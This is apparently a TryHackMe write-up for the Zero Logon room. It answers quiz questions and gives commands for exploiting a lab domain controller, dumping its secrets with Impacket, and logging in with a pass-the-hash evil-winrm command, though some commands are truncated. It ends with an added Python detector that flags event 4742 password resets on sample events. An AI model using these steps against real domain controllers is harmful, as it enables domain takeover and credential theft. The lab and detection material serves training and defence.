Zero Logon on TryHackMe

This is the write-up for the Zero Logon room on TryHackMe, which is part of the TryHackMe Cyber Defense Path.

Connect to the TryHackMe lab environment over the VPN, or use the AttackBox on the TryHackMe site.

TASK Zero Logon

Task 1

Read everything in the task and press complete.

  • Tom Tervoort of Secura –
  • Microsoft –
  • Microsoft –

Task 2

Install Impacket, if it is not already installed, using the commands below:

python3 -m pip install virtualenv

python3 -m virtualenv impacketEnv

source impacketEnv/bin/activate

pip install git+

Task 3

Open a terminal and navigate to the download directory.

Enter the following command to get the PoC file

3.1 What method will allow us to change Passwords over NRPC?

You can find this in the picture of task 1

Answer: NetrServerPasswordSet2

3.2 What are the required fields for the method per the Microsoft Documentation?

Documentation can be found here [MS-NRPC]: NetrServerPasswordSet2 (Opnum 30) | Microsoft Docs

Answer: PrimaryName,AccountName,SecureChannelType,ComputerName,Authenticator,ReturnAuthenticator,ClearNewPassword

3.3 What Opnumber is the Method?

Answer: 30

Task 4

Start the machine attached to this task

First we are getting the correct py


4.1 What is the NetBIOS name of the Domain Controller?

Type in the following command to run an nmap scan:

nmap -sC -sV

Answer: DC01

4.2 What is the NetBIOS domain name of the network?


4.3 What domain are you attacking?

Answer: Hololive.local

4.4 What is the Local Administrator’s NTLM hash?

Make sure you have followed along with task 2 to get Impacket in an env.

Run the following command to exploit the domain controller:

python3 DC01 MACHINE_IP

Now we can do a secrets dump by typing in the following command -just-dc -no-pass DC01\$@MACHINE_IP

The answer is what is highlighted

4.5 How many Domain Admin accounts are there?

Count all accounts that are prefixed with A-

Answer: 2

4.6 What is the root flag?

We will do this with evil-winrm by typing the following command

evil-winrm -i -u Administrator -H <FOUND HASH IN PREVIOUS ANSWER>

As you can see in the screenshot, the flag is on the user's desktop in a file called root.txt. You can see the content with the command type
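
From the defender's side, the machine-account password reset in 4.4 shows up in the domain controller's Security log as event 4742. The following is an added example, not part of the original write-up: it applies a common heuristic (4742 on a DC account, subject ANONYMOUS LOGON, PasswordLastSet changed) to constructed sample events. The DC_ACCOUNTS list, the EXAMPLE domain, the WS07$ host and all timestamps are assumptions.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
DC_ACCOUNTS = {"DC01$"}  # assumption: machine accounts of your domain controllers

def make_event(event_id, **data):
    """Build a constructed record in the Windows event XML layout (sample data)."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'</System><EventData>{fields}</EventData></Event>')

# Constructed sample events; names, domain and timestamps are made up.
ANON = {"SubjectUserName": "ANONYMOUS LOGON", "SubjectDomainName": "NT AUTHORITY"}
SAMPLE_EVENTS = [
    # DC account password set by an anonymous session: should be flagged.
    make_event(4742, TargetUserName="DC01$", PasswordLastSet="1/1/2021 10:15:02 AM", **ANON),
    # Same account changed anonymously, but the password was not touched.
    make_event(4742, TargetUserName="DC01$", PasswordLastSet="-", **ANON),
    # Password set by the DC's own account.
    make_event(4742, TargetUserName="DC01$", SubjectUserName="DC01$",
               SubjectDomainName="EXAMPLE", PasswordLastSet="1/1/2021 09:00:00 AM"),
    # Member workstation, not in DC_ACCOUNTS: out of scope for this check.
    make_event(4742, TargetUserName="WS07$", PasswordLastSet="1/1/2021 11:30:00 AM", **ANON),
    make_event(4624, TargetUserName="Administrator", SubjectUserName="-"),  # unrelated ID
]

def parse_event(xml_text):
    """Return (event_id, {field: value}) for one event record."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    data = {d.get("Name"): d.text or "" for d in root.iterfind("e:EventData/e:Data", NS)}
    return event_id, data

def find_suspicious_resets(events, dc_accounts=DC_ACCOUNTS):
    """Flag 4742 records where a DC password was set by ANONYMOUS LOGON."""
    dcs = {name.upper() for name in dc_accounts}
    hits = []
    for xml_text in events:
        event_id, data = parse_event(xml_text)
        if (event_id == 4742
                and data.get("TargetUserName", "").upper() in dcs
                and data.get("SubjectUserName", "").upper() == "ANONYMOUS LOGON"
                and data.get("PasswordLastSet", "-") != "-"):
            hits.append(data)
    return hits

if __name__ == "__main__":
    for hit in find_suspicious_resets(SAMPLE_EVENTS):
        print("ALERT:", hit["TargetUserName"], "password set at", hit["PasswordLastSet"])
```

A hit from this check is a lead to investigate, not proof on its own; correlate it with the source of the Netlogon session before acting.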

